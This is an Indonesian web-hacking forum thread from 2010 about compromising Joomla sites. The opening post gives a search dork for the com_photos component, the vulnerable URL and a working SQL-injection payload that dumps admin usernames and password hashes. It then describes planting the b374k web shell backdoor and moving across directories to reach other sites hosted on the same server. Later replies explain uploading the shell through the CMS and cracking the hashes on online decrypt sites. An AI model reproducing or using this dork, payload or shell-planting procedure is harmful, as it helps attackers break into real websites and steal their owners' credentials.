jumping dengan b374k

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

jumping dengan b374k

Post by anharku » Thu Jul 01, 2010 11:34 am

hehehe..ketemu lagi dengan saya anharku
cuma seorang newbie yang mau berbagi aja..
saya kemarin habis dapet exp dari sumber sebelah nigh:

Dork : inurl:"com_photos"
[ Vulnerable File ]
[path]/index.php?option=com_photos&view=display&id=[ SQL ]
[ XpL ]
-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users+limit+0,1--

terus pas bisa masuk ane tanam nigh shell alias BACKDOOR (b374k) nagh pas masuk saya coba jumping dari root/directory belakang ke depannya..depanya klo pas beruntung dapet folder2 yang namanya domain .com ya kaya gambar ini nigh

Image

nagh kalo dagh dapet yg kaya gini yahh terus tinggal dinikmati aja.... :devil
mau exploitasi lebih dalem..tapi ingat jangan di dropdown kasian yg punya web :circle:

dagh agh semoga bermanfaat... :love:

salam

anharku
http://codenesia.com | http://anharku.tk | http://anharku.us

warxdoyo
Posts: 85
Joined: Mon Jun 21, 2010 8:39 pm
Contact:

Re: jumping dengan b374k

Post by warxdoyo » Thu Jul 01, 2010 2:30 pm

anharku wrote:hehehe..ketemu lagi dengan saya anharku
cuma seorang newbie yang mau berbagi aja..
saya kemarin habis dapet exp dari sumber sebelah nigh:

Dork : inurl:"com_photos"
[ Vulnerable File ]
[path]/index.php?option=com_photos&view=display&id=[ SQL ]
[ XpL ]
-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users+limit+0,1--

terus pas bisa masuk ane tanam nigh shell alias BACKDOOR (b374k) nagh pas masuk saya coba jumping dari root/directory belakang ke depannya..depanya klo pas beruntung dapet folder2 yang namanya domain .com ya kaya gambar ini nigh

Image

nagh kalo dagh dapet yg kaya gini yahh terus tinggal dinikmati aja.... :devil
mau exploitasi lebih dalem..tapi ingat jangan di dropdown kasian yg punya web :circle:

dagh agh semoga bermanfaat... :love:

salam

anharku
http://codenesia.com http://anharku.tk | http://anharku.us

bisa ajar`n saya gak??kaya`n bagus tuh..... :kaca: :kaca:

User avatar
anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: jumping dengan b374k

Post by anharku » Thu Jul 01, 2010 3:10 pm

saya juga lagi belajar...
dicoba2 saja itu dork dan exploit nya :circle:

RJ-45
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Re: jumping dengan b374k

Post by RJ-45 » Thu Jul 01, 2010 6:45 pm

Terima kasih kakak..................!

User avatar
anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: jumping dengan b374k

Post by anharku » Thu Jul 01, 2010 11:00 pm

ia sama2,.... :love:

RJ-45
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Re: jumping dengan b374k

Post by RJ-45 » Fri Jul 02, 2010 12:48 am

Saya bingung cara masangnya kakak................!
:pusing: :pusing: :pusing: :pusing: :pusing:

User avatar
anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: jumping dengan b374k

Post by anharku » Fri Jul 02, 2010 9:26 am

cara pasangnya kan tinggal di upload ke server terus di panggil alamat URL nya :circle:

warxdoyo
Posts: 85
Joined: Mon Jun 21, 2010 8:39 pm
Contact:

Re: jumping dengan b374k

Post by warxdoyo » Fri Jul 02, 2010 9:34 am

RJ-45 wrote:Saya bingung cara masangnya kakak................!
:pusing: :pusing: :pusing: :pusing: :pusing:

saya bingung cara masuknya neh RJ tp kalo masang shell saya tau,,,,,,, :pusing:: :pusing: :pusing: :pusing: :pusing: pusing: :pusing: :pusing: :pusing: :pusing:

User avatar
anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: jumping dengan b374k

Post by anharku » Fri Jul 02, 2010 10:14 am

cara masuknya banyak kok..
intinya kamu harus punya akses sebagai administrator...

banyak cara kok...cari errornya terus munculin user passwordnya..
paswordnya biasanya masih encrypt'an jd harus di decrypt..
buat nge-decrypt banyak kok web penyedia jasa decript
seperti:

http://hashchecker.de

http://md5decrypter.co.uk

teknik yg lain kalau di joomla yagh reset password...
yang penting kamu masuk ke CMS nya terus upload shell atau BD b3j4k..

ga ada yg praktis sih semua butuh tahap dan pembelajaran...
ga cuma itu caranya kembangin sendiri dan kamu akan menemukan seni dalam dunia hacking :devil

just... membagi ilmu dari newbie :circle:

User avatar
Darkzzzz
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
Contact:

Re: jumping dengan b374k

Post by Darkzzzz » Sun Jul 04, 2010 9:40 am

Saya juga lagi belajar ...
I'm not A Hacker, But I'm A Image

Post Reply

Return to “Web Hacking”